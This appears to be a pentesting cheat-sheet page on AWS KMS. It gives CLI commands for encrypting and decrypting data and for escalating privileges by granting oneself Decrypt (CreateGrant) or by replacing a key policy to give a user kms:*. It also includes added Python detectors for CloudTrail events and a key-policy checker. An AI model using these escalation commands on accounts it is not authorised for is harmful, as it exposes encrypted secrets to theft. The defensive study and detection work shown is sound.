KMS

KMS overview and attacks

Encrypt and Decrypt data with KMS Key

Encrypt Data

# AWS CLI v2 treats --plaintext as binary: pass a file with fileb:// (or a base64-encoded string)
aws kms encrypt --key-id <keyId> --plaintext fileb://<plaintextFile> --output text --query CiphertextBlob | base64 --decode > ciphertext.bin

Decrypt Data

# --key-id is optional for symmetric keys (the key id is embedded in the ciphertext)
aws kms decrypt \
    --ciphertext-blob fileb://<ciphertextFile> \
    --key-id <keyId> \
    --output text \
    --query Plaintext | base64 --decode

kms:CreateGrant

  • With this action available, you can provide yourself a Grant to a KMS key and effectively give yourself access.

  • Grants are considered along with key policies and IAM policies and often used for temporary permissions because you can create one, use its permissions, and delete it without changing your key policies or IAM policies.

aws kms create-grant --key-id <keyId> --grantee-principal <userARN> --operations Decrypt
# create-grant returns a GrantId and a GrantToken; pass the token until the grant has propagated
aws kms decrypt --grant-tokens <grantToken> --ciphertext-blob fileb://<ciphertextFile> --key-id <keyId> --output text --query Plaintext | base64 --decode
# grants stay visible to anyone with kms:ListGrants until retired or revoked
aws kms list-grants --key-id <keyId>
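A defender's counterpart to the commands above, added here as an example and not part of the original page: a small triage function over CloudTrail-style CreateGrant and PutKeyPolicy records. The records, ARNs and key id are constructed, and the allowlist of principals expected to create grants is an assumption to be filled from your own environment. It flags a caller that makes itself the grantee, a grant for Decrypt (or another sensitive operation) from a principal outside the allowlist, and every PutKeyPolicy. The STS assumed-role ARN that appears as the caller is normalised to the underlying IAM role so that the self-grant comparison also works for roles.

```python
import json

# Constructed CloudTrail-style records for illustration (not real events).
# Field names follow the CloudTrail record format; ARNs and key ids are made up.
KEY_ARN = "arn:aws:kms:us-east-1:123456789012:key/00000000-0000-0000-0000-000000000001"
SAMPLE_EVENTS = [
    {   # routine: an app role grants a worker role non-sensitive operations
        "eventSource": "kms.amazonaws.com", "eventName": "CreateGrant",
        "userIdentity": {"arn": "arn:aws:sts::123456789012:assumed-role/AppRole/i-0abc"},
        "requestParameters": {"keyId": KEY_ARN,
                              "granteePrincipal": "arn:aws:iam::123456789012:role/service-role/LambdaWorker",
                              "operations": ["Encrypt", "GenerateDataKey"]}},
    {   # self-grant: the caller makes itself the grantee for Decrypt
        "eventSource": "kms.amazonaws.com", "eventName": "CreateGrant",
        "userIdentity": {"arn": "arn:aws:iam::123456789012:user/dev-alice"},
        "requestParameters": {"keyId": KEY_ARN,
                              "granteePrincipal": "arn:aws:iam::123456789012:user/dev-alice",
                              "operations": ["Decrypt"]}},
    {   # a principal outside the grant-creator allowlist hands out Decrypt
        "eventSource": "kms.amazonaws.com", "eventName": "CreateGrant",
        "userIdentity": {"arn": "arn:aws:iam::123456789012:user/dev-bob"},
        "requestParameters": {"keyId": KEY_ARN,
                              "granteePrincipal": "arn:aws:iam::123456789012:role/service-role/LambdaWorker",
                              "operations": ["Decrypt"]}},
    {   # key policy replaced; always worth a look
        "eventSource": "kms.amazonaws.com", "eventName": "PutKeyPolicy",
        "userIdentity": {"arn": "arn:aws:iam::123456789012:user/dev-alice"},
        "requestParameters": {"keyId": KEY_ARN, "policyName": "default"}},
    {   # unrelated service; skipped
        "eventSource": "s3.amazonaws.com", "eventName": "GetObject",
        "userIdentity": {"arn": "arn:aws:iam::123456789012:user/dev-alice"},
        "requestParameters": {"bucketName": "example-bucket", "key": "report.csv"}},
]

# Grant operations that expose plaintext or let the grantee extend access further.
SENSITIVE_OPERATIONS = {"Decrypt", "ReEncryptFrom", "CreateGrant"}


def principal_key(arn):
    """Reduce an ARN to (account, kind, name) so that an STS assumed-role ARN
    compares equal to the IAM role it came from. IAM role/user paths are dropped."""
    parts = arn.split(":", 5)
    if len(parts) != 6:
        return None
    account, resource = parts[4], parts[5]
    kind, _, rest = resource.partition("/")
    if kind == "assumed-role":
        return (account, "role", rest.split("/", 1)[0])
    if kind in ("role", "user"):
        return (account, kind, rest.rsplit("/", 1)[-1])
    return (account, kind, rest)


def _finding(event, severity, reason):
    return {"eventName": event["eventName"], "caller": event["userIdentity"]["arn"],
            "keyId": event["requestParameters"].get("keyId"),
            "severity": severity, "reason": reason}


def triage_kms_events(events, trusted_grant_creators=()):
    """Flag CreateGrant/PutKeyPolicy records that look like privilege escalation.
    trusted_grant_creators: ARNs of principals expected to create grants (assumed allowlist)."""
    trusted = {principal_key(arn) for arn in trusted_grant_creators}
    findings = []
    for event in events:
        if event.get("eventSource") != "kms.amazonaws.com":
            continue
        name = event.get("eventName")
        caller = event.get("userIdentity", {}).get("arn", "")
        params = event.get("requestParameters") or {}
        if name == "CreateGrant":
            grantee_key = principal_key(params.get("granteePrincipal", ""))
            sensitive = set(params.get("operations", [])) & SENSITIVE_OPERATIONS
            if grantee_key is not None and grantee_key == principal_key(caller):
                findings.append(_finding(event, "HIGH", "caller created a grant for itself"))
            elif sensitive and principal_key(caller) not in trusted:
                findings.append(_finding(event, "MEDIUM",
                                         "unlisted creator granted " + ", ".join(sorted(sensitive))))
        elif name == "PutKeyPolicy":
            findings.append(_finding(event, "HIGH", "key policy replaced"))
    return findings


if __name__ == "__main__":
    for finding in triage_kms_events(SAMPLE_EVENTS, ["arn:aws:iam::123456789012:role/AppRole"]):
        print(json.dumps(finding))
```

In a real pipeline the same function runs over events pulled from CloudTrail Lake or an S3 trail; the allowlist is the only environment-specific input, and the PutKeyPolicy rule is intentionally unconditional because key policies change rarely enough to review every time.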

kms:PutKeyPolicy

  • With this action available, you can update or replace the Key Policy for a KMS key to give yourself permissions. The new policy replaces the existing one in full, so any statement left out (including the account root's) is gone.

# --policy-name must be "default" (the only policy name KMS accepts); the file replaces the whole policy
aws kms put-key-policy --policy file://key-policy.json --policy-name default --key-id <keyId>
# sample key-policy.json

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::123456789012:root"
            },
            "Action": "kms:*",
            "Resource": "*"
        },
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::123456789012:user/<userName>"
            },
            "Action": [
                "kms:*"
            ],
            "Resource": "*"
        }
    ]
}
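Before a policy like the one above is applied with put-key-policy, a review step catches the mistakes that matter most: dropping the account root statement, opening the key to a wildcard or cross-account principal, or handing key-administration actions to an ordinary user. The checker below is an added example, not code from the original page; the account id, the candidate policy (modelled on the sample above) and the list of designated key administrators are constructed assumptions.

```python
import json

ACCOUNT_ID = "123456789012"  # constructed account id, not a real account

# Constructed candidate policy, modelled on the page's sample: it keeps the
# account root statement but also hands kms:* to a single IAM user.
CANDIDATE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::123456789012:root"},
         "Action": "kms:*", "Resource": "*"},
        {"Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::123456789012:user/dev-alice"},
         "Action": ["kms:*"], "Resource": "*"},
    ],
})

# Actions that let a principal change who can use the key or destroy it.
ADMIN_ACTIONS = {"kms:PutKeyPolicy", "kms:CreateGrant", "kms:ScheduleKeyDeletion", "kms:*", "*"}


def _as_list(value):
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _principals(stmt):
    """Flatten the Principal element into a list of AWS ARNs, or ['*'] for a wildcard."""
    principal = stmt.get("Principal")
    if principal == "*":
        return ["*"]
    if isinstance(principal, dict):
        return _as_list(principal.get("AWS"))
    return []


def _account_of(arn):
    parts = arn.split(":")
    return parts[4] if len(parts) >= 6 else None


def check_key_policy(policy_json, account_id, admins=()):
    """Return review findings (severity, statement index, message) for a key policy
    before it is applied. admins: ARNs allowed to hold ADMIN_ACTIONS (assumed list)."""
    policy = json.loads(policy_json)
    root_arn = f"arn:aws:iam::{account_id}:root"
    trusted_admins = set(admins) | {root_arn}
    findings = []
    keeps_root = False
    for index, stmt in enumerate(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        actions = set(_as_list(stmt.get("Action")))
        for principal in _principals(stmt):
            if principal == "*":
                findings.append({"severity": "HIGH", "statement": index,
                                 "message": "wildcard principal: any AWS identity may use this key"})
                continue
            if principal == root_arn:
                keeps_root = True
            if _account_of(principal) != account_id:
                findings.append({"severity": "MEDIUM", "statement": index,
                                 "message": f"cross-account principal {principal}"})
            granted_admin = actions & ADMIN_ACTIONS
            if principal not in trusted_admins and granted_admin:
                findings.append({"severity": "HIGH", "statement": index,
                                 "message": f"{principal} receives key-administration actions {sorted(granted_admin)}"})
    if not keeps_root:
        findings.append({"severity": "HIGH", "statement": None,
                         "message": "policy does not allow the account root; the key may become unmanageable if no other administrator remains"})
    return findings


if __name__ == "__main__":
    for finding in check_key_policy(CANDIDATE_POLICY, ACCOUNT_ID):
        print(json.dumps(finding))
```

The checker ignores Condition blocks, so a statement that is narrowed by a condition still shows up; that is deliberate for a pre-apply review, where a false positive costs a glance and a missed root statement costs the key.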
